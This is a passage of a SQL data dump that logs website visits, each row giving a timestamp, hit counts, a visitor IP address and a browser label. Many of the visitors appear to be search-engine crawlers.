6,1509122432,1,1,0,0,'51.255.65.66','other'),(171137,1509122683,1,1,0,0,'168.235.198.178','other'),(171138,1509122918,1,1,0,0,'66.249.64.15','chrome'),(171139,1509122981,1,1,0,0,'66.249.70.27','chrome'),(171140,1509123326,1,1,0,0,'199.58.86.211','other'),(171141,1509123351,1,1,0,0,'51.255.65.67','other'),(171142,1509123943,1,1,0,0,'217.182.132.62','other'),(171143,1509124265,1,1,0,0,'37.190.163.241','chrome'),(171144,1509124372,1,0,1,0,'66.249.70.29',''),(171145,1509124974,1,1,0,0,'37.73.196.74','chrome'),(171146,1509125132,1,1,0,0,'51.255.65.59','other'),(171147,1509125196,2,2,0,0,'51.255.71.110','other'),(171148,1509125431,1,1,0,0,'91.196.178.135','chrome'),(171149,1509125523,1,1,0,0,'217.182.132.85','other'),(171150,1509125728,1,1,0,0,'217.69.133.230','other'),(171151,1509126446,1,0,1,0,'66.249.70.25',''),(171152,1509126759,1,1,0,0,'37.73.220.250','chrome'),(171153,1509127152,1,1,0,0,'164.132.162.157','other'),(171154,1509127180,1,1,0,0,'66.249.64.14','chrome'),(171155,1509127181,1,1,0,0,'157.55.39.157','other'),(171156,1509127188,1,1,0,0,'66.249.70.25','chrome'),(171157,1509127782,1,1,0,0,'217.69.133.228','other'),(171158,1509127906,1,1,0,0,'51.255.65.68','other'),(171159,1509128004,1,0,1,0,'66.249.70.27',''),(171160,1509128265,1,1,0,0,'217.69.133.229','other'),(171161,1509128435,1,1,0,0,'91.196.178.166','chrome'),(171162,1509128598,1,1,0,0,'217.69.136.209','other'),(171163,1509128823,1,0,1,0,'66.249.64.15',''),(171164,1509128938,1,1,0,0,'88.100.199.207','firefox'),(171165,1509128956,2,2,0,0,'40.77.167.60','other'),(171166,1509129187,1,1,0,0,'51.255.65.69','other'),(171167,1509129447,1,0,1,0,'66.249.70.29',''),(171168,1509129924,1,1,0,0,'137.74.207.170','other'),(171169,1509130130,1,1,0,0,'8.29.198.27','other'),(171170,1509130264,1,1,0,0,'164.132.162.156','other'),(171171,1509130269,1,1,0,0,'51.255.65.43','other'),(171172,1509131347,1,0,1,0,'66.249.64.14',''),(171173,1509131432,1,1,0,0,'180.76.15.19','other'),(171174,1509131504,2,2,0,0,'91.196.178.132','chrome'),(171175,1509131619,1,1,0,0,'66.249.64.14','chrome'),(171176,1509132003,1,1,0,0,'51.255.65.57','other'),(171177,1509132021,1,1,0,0,'178.154.171.88','other'),(171178,1509132084,1,1,0,0,'137.74.207.116','other'),(171179,1509132460,1,1,0,0,'198.37.118.38','firefox'),(171180,1509132584,1,1,0,0,'91.196.178.166','chrome'),(171181,1509133166,1,1,0,0,'51.255.65.18','other'),(171182,1509133175,1,0,1,0,'66.249.64.15',''),(171183,1509133290,1,1,0,0,'141.8.142.74','other'),(171184,1509133333,1,1,0,0,'51.255.65.84','other'),(171185,1509133388,1,1,0,0,'66.249.70.27','chrome'),(171186,1509133397,1,1,0,0,'51.255.71.127','other'),(171187,1509133510,1,1,0,0,'87.250.224.46','other'),(171188,1509133602,1,1,0,0,'91.196.178.166','chrome'),(171189,1509133651,1,0,1,0,'66.249.64.16',''),(171190,1509134745,1,1,0,0,'164.132.162.158','other'),(171191,1509134857,1,1,0,0,'173.234.234.206','other'),(171192,1509135084,1,1,0,0,'217.182.132.19','other'),(171193,1509135389,1,1,0,0,'217.182.132.171','other'),(171194,1509135534,1,1,0,0,'217.182.132.62','other'),(171195,1509135544,1,1,0,0,'157.55.39.143','other'),(171196,1509135563,1,1,0,0,'217.182.132.192','other'),(171197,1509135851,1,0,1,0,'66.249.64.14',''),(171198,1509136031,1,1,0,0,'217.182.132.22','other'),(171199,1509136347,1,1,0,0,'217.69.133.222','other'),(171200,1509136427,1,1,0,0,'217.182.132.27','other'),(171201,1509136458,1,1,0,0,'51.255.65.38','other'),(171202,1509136493,1,1,0,0,'66.249.64.16','chrome'),(171203,1509136976,1,1,0,0,'51.255.65.57','other'),(171204,1509137506,2,2,0,0,'141.8.142.74','other'),(171205,1509137683,1,1,0,0,'51.255.65.29','other'),(171206,1509137699,1,1,0,0,'79.165.121.182','chrome'),(171207,1509138294,1,1,0,0,'51.255.65.54','other'),(171208,1509138507,1,1,0,0,'35.184.189.105','other'),(171209,1509138566,1,1,0,0,'51.255.65.65','other'),(171210,1509138782,1,1,0,0,'51.255.71.100','other'),(171211,1509138783,1,1,0,0,'51.255.65.36','other'),(171212,1509138827,1,1,0,0,'54.165.59.7','other'),(171213,1509139041,1,1,0,0,'217.182.132.157','other'),(171214,1509139380,1,1,0,0,'157.55.39.157','other'),(171215,1509139605,1,1,0,0,'51.255.65.49','other'),(171216,1509139774,1,1,0,0,'217.69.133.84','other'),(171217,1509140098,1,1,0,0,'51.255.64.106','other'),(171218,1509140169,1,1,0,0,'178.154.171.88','other'),(171219,1509140310,1,1,0,0,'51.255.65.23','other'),(171220,1509140448,1,1,0,0,'51.255.65.32','other'),(171221,1509140857,1,1,0,0,'217.182.132.32','other'),(171222,1509140957,1,1,0,0,'8.29.198.27','other'),(171223,1509140967,3,3,0,0,'141.8.142.74','other'),(171224,1509141171,1,1,0,0,'66.249.70.25','chrome'),(171225,1509141344,1,0,1,0,'66.249.70.29',''),(171226,1509141459,1,1,0,0,'164.132.162.158','other'),(171227,1509141585,1,1,0,0,'217.182.132.154','other'),(171228,1509141795,1,1,0,0,'66.249.64.15','chrome'),(171229,1509142385,1,1,0,0,'217.69.133.243','other'),(171230,1509142894,1,1,0,0,'217.182.132.79','other'),(171231,1509143533,1,1,0,0,'137.74.207.119','other'),(171232,1509143809,1,1,0,0,'217.182.132.25','other'),(171233,1509144219,1,1,0,0,'217.69.133.14','other'),(171234,1509144490,1,0,1,0,'66.249.64.14',''),(171235,1509144760,2,2,0,0,'141.8.142.74','other'),(171236,1509145323,1,1,0,0,'217.182.132.82','other'),(171237,1509145389,1,1,0,0,'66.249.64.14','chrome'),(171238,1509145543,1,0,1,0,'66.249.70.27',''),(171239,1509145568,1,0,1,0,'66.249.64.15',''),(171240,1509145767,1,1,0,0,'178.154.171.88','other'),(171241,1509146418,1,0,1,0,'66.249.70.25',''),(171242,1509146773,1,0,1,0,'66.249.64.29',''),(171243,1509147044,1,1,0,0,'141.8.142.74','other'),(171244,1509147067,1,1,0,0,'164.132.162.187','other'),(171245,1509147324,1,1,0,0,'217.182.132.188','other'),(171246,1509147827,1,1,0,0,'51.255.65.74','other'),(171247,1509147848,1,1,0,0,'137.74.203.194','other'),(171248,1509147886,1,1,0,0,'137.74.207.159','other'),(171249,1509148121,1,1,0,0,'137.74.207.120','other'),(171250,1509148410,1,1,0,0,'137.74.207.108','other'),(171251,1509148523,1,1,0,0,'51.255.65.81','other'),(171252,1509148645,1,1,0,0,'40.77.167.60','other'),(171253,1509148778,1,1,0,0,'178.154.171.88','other'),(171254,1509149094,1,1,0,0,'51.255.65.18','other'),(171255,1509149258,6,6,0,0,'173.212.246.194','other'),(171256,1509149436,1,1,0,0,'51.255.65.90','other'),(171257,1509149888,1,1,0,0,'66.249.64.30','chrome'),(171258,1509149994,2,2,0,0,'141.8.142.74','other'),(171259,1509150264,1,1,0,0,'217.182.132.14','other'),(171260,1509150479,1,1,0,0,'137.74.201.100','other'),(171261,1509151327,1,1,0,0,'66.249.70.25','chrome'),(171262,1509151373,1,1,0,0,'66.249.64.29','chrome'),(171263,1509151784,1,1,0,0,'8.29.198.27','other'),(171264,1509151996,1,1,0,0,'217.69.133.237','other'),(171265,1509152541,2,2,0,0,'141.8.142.74','other'),(171266,1509152546,1,1,0,0,'217.182.132.29','other'),(171267,1509153265,1,1,0,0,'51.255.71.131','other'),(171268,1509153440,1,1,0,0,'217.182.132.31','other'),(171269,1509153561,1,1,0,0,'51.255.65.56','other'),(171270,1509154155,1,1,0,0,'51.255.65.90','other'),(171271,1509154319,1,1,0,0,'51.255.71.129','other'),(171272,1509154354,1,1,0,0,'157.55.39.157','other'),(171273,1509155187,1,1,0,0,'51.255.71.117','other'),(171274,1509155204,2,2,0,0,'141.8.142.74','other'),(171275,1509155244,1,1,0,0,'217.182.132.174','other'),(171276,1509155320,1,1,0,0,'51.255.65.87','other'),(171277,1509155469,1,1,0,0,'51.255.71.114','other'),(171278,1509155642,1,1,0,0,'217.182.132.79','other'),(171279,1509155764,1,1,0,0,'164.132.162.164','other'),(171280,1509156159,1,1,0,0,'217.182.132.59','other'),(171281,1509156526,1,1,0,0,'87.250.224.46','other'),(171282,1509157047,1,1,0,0,'66.249.70.27','chrome'),(171283,1509157076,1,1,0,0,'188.32.129.200','chrome'),(171284,1509157218,1,0,1,0,'66.249.64.28',''),(171285,1509157704,1,1,0,0,'217.182.132.153','other'),(171286,1509157888,1,1,0,0,'51.255.65.72','other'),(171287,1509158065,1,1,0,0,'217.69.133.231','other'),(171288,1509158506,1,1,0,0,'66.249.70.29','chrome'),(171289,1509158743,1,1,0,0,'66.249.64.30','chrome'),(171290,1509158823,1,1,0,0,'51.255.65.42','other'),(171291,1509159260,1,0,1,0,'66.249.70.27',''),(171292,1509159524,1,1,0,0,'137.74.207.164','other'),(171293,1509160500,3,3,0,0,'204.12.226.26','other'),(171294,1509160778,1,1,0,0,'217.69.133.238','other'),(171295,1509160995,1,1,0,0,'217.69.133.240','other'),(171296,1509161365,1,1,0,0,'217.69.133.216','other'),(171297,1509161767,1,1,0,0,'66.249.70.27','chrome'),(171298,1509161802,1,1,0,0,'217.182.132.78','other'),(171299,1509161933,1,1,0,0,'178.154.171.88','other'),(171300,1509162058,1,1,0,0,'137.74.207.108','other'),(171301,1509162351,1,1,0,0,'164.132.162.188','other'),(171302,1509162381,1,1,0,0,'217.182.132.90','other'),(171303,1509162428,1,1,0,0,'217.182.132.50','other'),(171304,1509162530,1,1,0,0,'217.182.132.240','other'),(171305,1509162579,1,0,1,0,'66.249.64.29',''),(171306,1509162607,1,1,0,0,'8.29.198.27','other'),(171307,1509162942,1,1,0,0,'217.182.132.85','other'),(171308,1509163139,1,1,0,0,'51.255.65.68','other'),(171309,1509163226,1,1,0,0,'217.69.133.227','other'),(171310,1509163243,1,1,0,0,'157.55.39.143','other'),(171311,1509163678,1,1,0,0,'51.255.71.121','other'),(171312,1509163796,1,1,0,0,'66.249.64.29','chrome'),(171313,1509164223,1,1,0,0,'51.255.71.129','other'),(171314,1509164363,1,1,0,0,'51.255.65.87','other'),(171315,1509164797,1,1,0,0,'217.182.132.88','other'),(171316,1509165039,1,1,0,0,'51.255.65.55','other'),(171317,1509165273,1,0,1,0,'66.249.64.29',''),(171318,1509165384,1,1,0,0,'51.255.71.123','other'),(171319,1509165422,1,0,1,0,'66.249.64.30',''),(171320,1509165478,1,1,0,0,'87.250.224.46','other'),(171321,1509165564,1,1,0,0,'217.182.132.179','other'),(171322,1509166437,1,1,0,0,'217.182.132.192','other'),(171323,1509166713,2,2,0,0,'217.182.132.91','other'),(171324,1509166745,1,1,0,0,'217.182.132.20','other'),(171325,1509166771,1,1,0,0,'217.182.132.183','other'),(171326,1509166945,1,1,0,0,'217.69.133.251','other'),(171327,1509167007,1,1,0,0,'204.79.180.6','msie'),(171328,1509167274,1,1,0,0,'107.167.106.241','other'),(171329,1509167447,1,1,0,0,'217.69.136.207','other'),(171330,1509167451,2,1,1,0,'66.249.70.29',''),(171331,1509167997,1,1,0,0,'51.255.65.75','other'),(171332,1509168062,1,1,0,0,'217.182.132.177','other'),(171333,1509168174,1,1,0,0,'51.255.65.5','other'),(171334,1509168309,1,1,0,0,'217.69.133.29','other'),(171335,1509168311,1,1,0,0,'217.69.133.60','other'),(171336,1509168686,1,1,0,0,'109.173.36.144','msie'),(171337,1509168841,1,1,0,0,'217.182.132.96','other'),(171338,1509168881,1,0,1,0,'66.249.64.30',''),(171339,1509169000,1,1,0,0,'217.182.132.64','other'),(171340,1509169165,1,1,0,0,'66.249.64.30','chrome'),(171341,1509169860,1,1,0,0,'217.182.132.29','other'),(171342,1509169914,1,1,0,0,'217.69.133.236','other'),(171343,1509169946,1,1,0,0,'51.255.65.19','other'),(171344,1509169953,1,1,0,0,'217.182.132.21','other'),(171345,1509170064,1,1,0,0,'51.255.65.24','other'),(171346,1509170199,1,1,0,0,'217.182.132.6','other'),(171347,1509170885,1,1,0,0,'180.76.15.26','other'),(171348,1509171025,1,1,0,0,'51.255.65.48','other'),(171349,1509171041,4,4,0,0,'46.229.168.65','other'),(171350,1509171073,3,3,0,0,'46.229.168.79','other'),(171351,1509171079,1,1,0,0,'157.55.39.157','other'),(171352,1509171087,10,10,0,0,'46.229.168.69','other'),(171353,1509171119,1,1,0,0,'217.182.132.23','other'),(171354,1509171180,4,4,0,0,'46.229.168.73','other'),(171355,1509171198,4,4,0,0,'46.229.168.80','other'),(171356,1509171227,4,4,0,0,'46.229.168.67','other'),(171357,1509171239,1,1,0,0,'51.255.65.89','other'),(171358,1509171305,6,6,0,0,'46.229.168.74','other'),(171359,1509171322,4,4,0,0,'46.229.168.71','other'),(171360,1509171333,3,3,0,0,'46.229.168.76','other'),(171361,1509171385,1,1,0,0,'51.255.65.85','other'),(171362,1509171392,1,1,0,0,'51.255.65.5','other'),(171363,1509171398,6,6,0,0,'46.229.168.68','other'),(171364,1509171464,4,4,0,0,'46.229.168.77','other'),(171365,1509171648,6,6,0,0,'46.229.168.66','other'),(171366,1509171701,6,6,0,0,'46.229.168.78','other'),(171367,1509171716,3,3,0,0,'46.229.168.75','other'),(171368,1509171822,1,1,0,0,'40.77.167.60','other'),(171369,1509171853,6,6,0,0,'46.229.168.72','other'),(171370,1509171879,1,1,0,0,'51.255.65.71','other'),(171371,1509171894,1,1,0,0,'217.69.133.60','other'),(171372,1509171929,4,4,0,0,'46.229.168.70','other'),(171373,1509172143,8,8,0,0,'46.229.168.69','other'),(171374,1509172229,6,6,0,0,'46.229.168.74','other'),(171375,1509172274,1,1,0,0,'217.182.132.79','other'),(171376,1509172287,7,7,0,0,'46.229.168.79','other'),(171377,1509172320,4,4,0,0,'46.229.168.73','other'),(171378,1509172399,3,3,0,0,'46.229.168.68','other'),(171379,1509172436,4,4,0,0,'46.229.168.67','other'),(171380,1509172491,4,4,0,0,'46.229.168.65','other'),(171381,1509172554,3,3,0,0,'46.229.168.77','other'),(171382,1509172571,5,5,0,0,'46.229.168.71','other'),(171383,1509172825,4,4,0,0,'46.229.168.80','other'),(171384,1509172833,7,7,0,0,'46.229.168.70','other'),(171385,1509173030,1,1,0,0,'66.249.70.29','chrome'),(171386,1509173139,2,2,0,0,'46.229.168.76','other'),(171387,1509173226,7,7,0,0,'46.229.168.79','other'),(171388,1509173309,4,4,0,0,'46.229.168.73','other'),(171389,1509173397,2,2,0,0,'46.229.168.75','other'),(171390,1509173429,1,1,0,0,'8.29.198.27','other'),(171391,1509173431,1,1,0,0,'51.255.71.130','other'),(171392,1509173526,3,3,0,0,'46.229.168.71','other'),(171393,1509173535,1,1,0,0,'217.182.132.94','other'),(171394,1509173706,4,4,0,0,'46.229.168.69','other'),(171395,1509173816,2,2,0,0,'46.229.168.78','other'),(171396,1509173827,5,5,0,0,'46.229.168.80','other'),(171397,1509173856,3,3,0,0,'46.229.168.66','other'),(171398,1509173902,1,0,1,0,'66.249.64.30',''),(171399,1509173918,5,5,0,0,'46.229.168.74','other'),(171400,1509173983,5,5,0,0,'46.229.168.77','other'),(171401,1509174001,6,6,0,0,'46.229.168.70','other'),(171402,1509174020,1,1,0,0,'46.229.168.68','other'),(171403,1509174139,1,1,0,0,'51.255.71.132','other'),(171404,1509174156,5,5,0,0,'46.229.168.67','other'),(171405,1509174174,3,3,0,0,'46.229.168.76','other'),(171406,1509174278,2,2,0,0,'46.229.168.72','other'),(171407,1509174314,9,9,0,0,'46.229.168.79','other'),(171408,1509174335,2,2,0,0,'46.229.168.65','other'),(171409,1509174469,1,1,0,0,'185.127.24.126','msie'),(171410,1509174524,1,1,0,0,'46.229.168.73','other'),(171411,1509174727,1,1,0,0,'66.249.64.28','chrome'),(171412,1509174748,8,8,0,0,'46.229.168.71','other'),(171413,1509174779,5,5,0,0,'46.229.168.80','other'),(171414,1509174811,2,2,0,0,'46.229.168.78','other'),(171415,1509174840,8,8,0,0,'46.229.168.69','other'),(171416,1509174978,8,8,0,0,'46.229.168.68','other'),(171417,1509175023,8,8,0,0,'46.229.168.74','other'),(171418,1509175062,4,4,0,0,'46.229.168.77','other'),(171419,1509175239,2,2,0,0,'46.229.168.67','other'),(171420,1509175276,1,1,0,0,'217.69.133.231','other'),(171421,1509175278,1,1,0,0,'217.69.133.69','other'),(171422,1509175279,3,3,0,0,'46.229.168.65','other'),(171423,1509175336,1,1,0,0,'217.182.132.175','other'),(171424,1509175341,4,4,0,0,'46.229.168.70','other'),(171425,1509175595,4,4,0,0,'46.229.168.73','other'),(171426,1509175651,6,6,0,0,'46.229.168.71','other'),(171427,1509175704,1,1,0,0,'51.255.65.12','other'),(171428,1509175708,5,5,0,0,'46.229.168.79','other'),(171429,1509175726,4,4,0,0,'46.229.168.80','other'),(171430,1509175764,6,6,0,0,'46.229.168.76','other'),(171431,1509175798,3,3,0,0,'46.229.168.66','other'),(171432,1509175823,1,1,0,0,'91.196.178.132','chrome'),(171433,1509175841,5,5,0,0,'46.229.168.69','other'),(171434,1509175952,6,6,0,0,'46.229.168.74','other'),(171435,1509176113,3,3,0,0,'46.229.168.77','other'),(171436,1509176142,3,3,0,0,'46.229.168.78','other'),(171437,1509176164,1,0,1,0,'66.249.64.30',''),(171438,1509176210,5,5,0,0,'46.229.168.72','other'),(171439,1509176260,6,6,0,0,'46.229.168.65','other'),(171440,1509176417,4,4,0,0,'46.229.168.75','other'),(171441,1509176518,5,5,0,0,'46.229.168.70','other'),(171442,1509176563,1,1,0,0,'46.229.168.68','other'),(171443,1509176596,1,1,0,0,'217.69.133.231','other'),(171444,1509176613,5,5,0,0,'46.229.168.71','other'),(171445,1509176701,1,1,0,0,'217.182.132.147','other'),(171446,1509176727,11,11,0,0,'46.229.168.79','other'),(171447,1509176759,4,4,0,0,'46.229.168.67','other'),(171448,1509176792,7,7,0,0,'46.229.168.73','other'),(171449,1509176823,2,2,0,0,'46.229.168.80','other'),(171450,1509176825,1,1,0,0,'217.182.132.148','other'),(171451,1509176859,2,2,0,0,'46.229.168.66','other'),(171452,1509177057,8,8,0,0,'69.30.198.178','other'),(171453,1509177106,1,1,0,0,'46.229.168.76','other'),(171454,1509177165,5,5,0,0,'46.229.168.72','other'),(171455,1509177203,6,6,0,0,'46.229.168.77','other'),(171456,1509177400,3,3,0,0,'46.229.168.69','other'),(171457,1509177437,4,4,0,0,'46.229.168.74','other'),(171458,1509177454,1,1,0,0,'46.229.168.75','other'),(171459,1509177490,9,9,0,0,'46.229.168.68','other'),(171460,1509177553,5,5,0,0,'46.229.168.70','other'),(171461,1509177627,4,4,0,0,'46.229.168.71','other'),(171462,1509177739,1,1,0,0,'46.229.168.73','other'),(171463,1509177806,1,1,0,0,'51.255.71.125','other'),(171464,1509177885,1,1,0,0,'46.229.168.78','other'),(171465,1509177915,1,1,0,0,'46.229.168.65','other'),(171466,1509177928,1,1,0,0,'46.229.168.67','other'),(171467,1509178004,1,1,0,0,'46.229.168.66','other'),(171468,1509178461,1,1,0,0,'95.220.88.173','msie'),(171469,1509178463,1,1,0,0,'217.182.132.15','other'),(171470,1509178872,1,1,0,0,'217.182.132.147','other'),(171471,1509178952,1,1,0,0,'66.249.70.27','chrome'),(171472,1509179142,1,1,0,0,'157.55.39.157','other'),(171473,1509179527,1,1,0,0,'176.31.231.10','other'),(171474,1509179854,1,0,1,0,'66.249.64.29',''),(171475,1509179957,1,1,0,0,'141.8.142.74','other'),(171476,1509180138,1,1,0,0,'51.255.65.9','other'),(171477,1509180155,1,1,0,0,'137.74.207.102','other'),(171478,1509180658,1,1,0,0,'51.255.65.55','other'),(171479,1509180698,1,0,1,0,'66.249.64.30',''),(171480,1509180722,2,1,1,0,'66.249.64.28',''),(171481,1509180962,1,1,0,0,'66.249.64.28','chrome'),(171482,1509180998,1,1,0,0,'87.250.224.46','other'),(171483,1509181263,1,1,0,0,'178.92.74.185','chrome'),(171484,1509182110,1,1,0,0,'151.80.27.116','other'),(171485,1509182663,1,1,0,0,'217.182.132.173','other'),(171486,1509182858,1,1,0,0,'51.255.65.9','other'),(171487,1509183238,1,1,0,0,'66.249.70.29','chrome'),(171488,1509183634,1,1,0,0,'51.255.65.59','other'),(171489,1509183991,1,1,0,0,'217.182.132.191','other'),(171490,1509184227,1,1,0,0,'217.182.132.80','other'),(171491,1509184254,1,1,0,0,'8.29.198.25','other'),(171492,1509184259,1,1,0,0,'51.255.65.8','other'),(171493,1509184343,1,1,0,0,'74.115.214.147','other'),(171494,1509184604,1,1,0,0,'51.255.65.94','other'),(171495,1509184995,1,1,0,0,'51.255.65.49','other'),(171496,1509185638,1,1,0,0,'37.9.113.157','other'),(171497,1509185704,1,1,0,0,'51.255.65.52','other'),(171498,1509185953,1,1,0,0,'51.255.65.85','other'),(171499,1509186064,1,1,0,0,'217.182.132.19','other'),(171500,1509186305,1,1,0,0,'137.74.207.159','other'),(171501,1509186678,2,2,0,0,'141.8.142.74','other'),(171502,1509186997,1,1,0,0,'91.196.178.161','chrome'),(171503,1509187048,1,1,0,0,'217.182.132.86','other'),(171504,1509187192,1,1,0,0,'217.182.132.92','other'),(171505,1509187208,1,1,0,0,'66.249.64.30','chrome'),(171506,1509187329,1,1,0,0,'204.79.180.10','msie'),(171507,1509187500,1,1,0,0,'40.77.167.60','other'),(171508,1509187740,1,1,0,0,'180.76.15.11','other'),(171509,1509187800,1,1,0,0,'51.255.65.57','other'),(171510,1509187909,1,1,0,0,'107.167.107.200','chrome'),(171511,1509187912,1,1,0,0,'107.167.107.200','opera'),(171512,1509187997,1,1,0,0,'217.182.132.85','other'),(171513,1509188113,1,1,0,0,'217.182.132.4','other'),(171514,1509188254,1,1,0,0,'66.249.64.30','chrome'),(171515,1509188289,1,1,0,0,'217.182.132.28','other'),(171516,1509188782,1,1,0,0,'51.255.65.87','other'),(171517,1509189046,1,1,0,0,'37.9.113.101','other'),(171518,1509189240,1,1,0,0,'217.182.132.240','other'),(171519,1509189435,1,1,0,0,'66.249.70.25','chrome'),(171520,1509189676,1,1,0,0,'87.250.224.46','other'),(171521,1509190538,1,1,0,0,'137.74.201.99','other'),(171522,1509190969,1,1,0,0,'141.8.142.74','other'),(171523,1509191487,1,0,1,0,'66.249.64.30',''),(171524,1509191736,1,1,0,0,'180.76.15.8','other'),(171525,1509191809,1,1,0,0,'217.69.133.13','other'),(171526,1509191955,1,1,0,0,'51.255.71.126','other'),(171527,1509192066,1,1,0,0,'51.255.65.46','other'),(171528,1509192076,2,2,0,0,'178.154.171.88','other'),(171529,1509192259,1,1,0,0,'91.196.178.99','chrome'),(171530,1509192793,1,1,0,0,'66.249.64.30','chrome'),(171531,1509192928,1,0,1,0,'66.249.64.29',''),(171532,1509193022,1,1,0,0,'217.182.132.241','other'),(171533,1509193262,1,1,0,0,'87.250.224.46','other'),(171534,1509193327,1,1,0,0,'157.55.39.157','other'),(171535,1509193566,1,1,0,0,'40.77.167.109','other'),(171536,1509194266,1,1,0,0,'66.249.70.27','chrome'),(171537,1509194308,1,1,0,0,'141.8.142.74','other'),(171538,1509194550,1,0,1,0,'66.249.64.29',''),(171539,1509195090,1,1,0,0,'8.29.198.25','other'),(171540,1509195252,1,1,0,0,'51.255.65.9','other'),(171541,1509195611,1,1,0,0,'51.255.65.224','other'),(171542,1509196031,3,3,0,0,'173.212.254.158','other'),(171543,1509196336,1,1,0,0,'51.255.65.18','other'),(171544,1509196377,1,1,0,0,'217.69.133.13','other'),(171545,1509196600,1,1,0,0,'91.196.178.167','chrome'),(171546,1509196839,1,0,1,0,'66.249.64.30',''),(171547,1509197353,1,1,0,0,'51.255.65.44','other'),(171548,1509197830,1,1,0,0,'217.182.132.54','other'),(171549,1509197914,1,0,1,0,'66.249.64.28',''),(171550,1509197949,1,1,0,0,'199.58.86.209','other'),(171551,1509197957,1,1,0,0,'37.9.113.182','other'),(171552,1509198021,1,1,0,0,'51.255.65.49','other'),(171553,1509198027,1,1,0,0,'66.249.64.28','chrome'),(171554,1509198036,1,1,0,0,'91.196.178.65','chrome'),(171555,1509198371,1,1,0,0,'141.8.142.74','other'),(171556,1509198694,1,1,0,0,'217.182.132.146','other'),(171557,1509199169,1,1,0,0,'91.196.176.13','chrome'),(171558,1509199309,1,1,0,0,'178.92.74.185','chrome'),(171559,1509199361,1,1,0,0,'217.69.133.29','other'),(171560,1509199391,1,1,0,0,'66.249.70.25','chrome'),(171561,1509199678,1,0,1,0,'66.249.64.29',''),(171562,1509199758,1,1,0,0,'157.55.39.143','other'),(171563,1509199788,1,1,0,0,'67.215.230.91','other'),(171564,1509199839,1,1,0,0,'137.74.207.108','other'),(171565,1509199990,1,1,0,0,'51.255.65.97','other'),(171566,1509200514,1,1,0,0,'51.255.65.36','other'),(171567,1509200601,1,1,0,0,'137.74.207.164','other'),(171568,1509200790,1,1,0,0,'178.154.171.88','other'),(171569,1509201011,1,1,0,0,'51.255.65.84','other'),(171570,1509201056,1,1,0,0,'51.255.65.95','other'),(171571,1509201134,1,1,0,0,'137.74.201.108','other'),(171572,1509201161,1,1,0,0,'137.74.207.102','other'),(171573,1509201184,1,1,0,0,'51.255.65.29','other'),(171574,1509201633,1,1,0,0,'51.255.65.20','other'),(171575,1509202507,2,2,0,0,'141.8.142.74','other'),(171576,1509202935,1,1,0,0,'87.250.224.46','other'),(171577,1509202997,1,1,0,0,'128.69.221.143','msie'),(171578,1509203369,1,1,0,0,'66.249.64.28','chrome'),(171579,1509203471,1,1,0,0,'178.154.171.88','other'),(171580,1509203513,1,1,0,0,'66.249.70.29','chrome'),(171581,1509204218,1,0,1,0,'66.249.64.30',''),(171582,1509204539,1,1,0,0,'51.255.65.45','other'),(171583,1509204568,1,1,0,0,'51.255.65.2','other'),(171584,1509204877,1,1,0,0,'164.132.162.155','other'),(171585,1509204997,1,1,0,0,'178.154.171.88','other'),(171586,1509205087,1,1,0,0,'217.182.132.21','other'),(171587,1509205596,1,1,0,0,'217.182.132.87','other'),(171588,1509205747,1,1,0,0,'137.74.207.119','other'),(171589,1509205749,1,1,0,0,'178.154.200.32','other'),(171590,1509205823,1,1,0,0,'51.255.65.78','other'),(171591,1509205848,1,0,1,0,'66.249.70.29',''),(171592,1509205849,1,1,0,0,'51.255.65.68','other'),(171593,1509205903,1,1,0,0,'51.255.65.69','other'),(171594,1509205926,1,1,0,0,'8.29.198.25','other'),(171595,1509206175,1,1,0,0,'51.255.65.54','other'),(171596,1509206181,1,1,0,0,'51.255.65.75','other'),(171597,1509206229,1,1,0,0,'217.182.132.77','other'),(171598,1509206432,1,1,0,0,'217.182.132.153','other'),(171599,1509206517,1,1,0,0,'180.76.15.32','other'),(171600,1509207020,1,1,0,0,'217.182.132.97','other'),(171601,1509207257,4,4,0,0,'173.208.157.186','other'),(171602,1509207425,1,1,0,0,'51.255.65.34','other'),(171603,1509207669,1,1,0,0,'164.132.162.156','other'),(171604,1509207681,1,0,1,0,'66.249.64.30',''),(171605,1509207771,1,1,0,0,'216.244.66.237','other'),(171606,1509208466,1,1,0,0,'178.154.171.88','other'),(171607,1509208546,1,1,0,0,'66.249.70.29','chrome'),(171608,1509208550,1,1,0,0,'66.249.64.30','chrome'),(171609,1509208700,1,1,0,0,'51.255.71.117','other'),(171610,1509208956,1,1,0,0,'217.182.132.64','other'),(171611,1509209134,1,1,0,0,'217.182.132.151','other'),(171612,1509209372,1,1,0,0,'51.255.65.5','other'),(171613,1509209408,1,1,0,0,'51.255.65.28','other'),(171614,1509209880,1,1,0,0,'51.255.65.224','other'),(171615,1509210352,1,1,0,0,'141.8.142.74','other'),(171616,1509210424,1,1,0,0,'217.182.132.4','other'),(171617,1509210824,2,2,0,0,'54.165.59.7','other'),(171618,1509211129,2,0,2,0,'66.249.64.28',''),(171619,1509211518,1,1,0,0,'217.182.132.174','other'),(171620,1509211631,1,1,0,0,'217.182.132.157','other'),(171621,1509211955,1,1,0,0,'178.154.171.88','other'),(171622,1509212001,1,1,0,0,'51.255.65.90','other'),(171623,1509212273,1,1,0,0,'51.255.71.125','other'),(171624,1509212862,1,1,0,0,'188.32.4.111','chrome'),(171625,1509212888,1,1,0,0,'37.73.228.181','chrome'),(171626,1509212902,1,1,0,0,'51.255.65.55','other'),(171627,1509213973,1,1,0,0,'37.9.113.100','other'),(171628,1509214042,1,1,0,0,'66.249.70.29','chrome'),(171629,1509214047,1,1,0,0,'66.249.64.30','chrome'),(171630,1509214092,1,1,0,0,'178.154.200.32','other'),(171631,1509214331,1,1,0,0,'51.255.65.16','other'),(171632,1509214737,1,1,0,0,'137.74.207.102','other'),(171633,1509214777,1,1,0,0,'141.8.142.74','other'),(171634,1509214936,1,1,0,0,'107.21.1.8','other'),(171635,1509215154,1,1,0,0,'216.244.66.237','other'),(171636,1509215840,2,2,0,0,'178.154.171.88','other'),(171637,1509215952,1,1,0,0,'217.182.132.70','other'),(171638,1509216175,1,1,0,0,'137.74.203.194','other'),(171639,1509216270,2,2,0,0,'141.8.142.74','other'),(171640,1509216753,1,1,0,0,'8.29.198.26','other'),(171641,1509217154,1,1,0,0,'91.196.178.130','chrome'),(171642,1509217307,1,1,0,0,'51.255.65.81','other'),(171643,1509217713,1,0,1,0,'66.249.70.29',''),(171644,1509217911,1,1,0,0,'217.182.132.65','other'),(171645,1509217938,1,1,0,0,'51.255.65.11','other'),(171646,1509218046,1,1,0,0,'217.182.132.50','other'),(171647,1509218075,1,1,0,0,'51.255.65.69','other'),(171648,1509218253,1,1,0,0,'178.154.171.88','other'),(171649,1509218361,1,1,0,0,'51.255.65.75','other'),(171650,150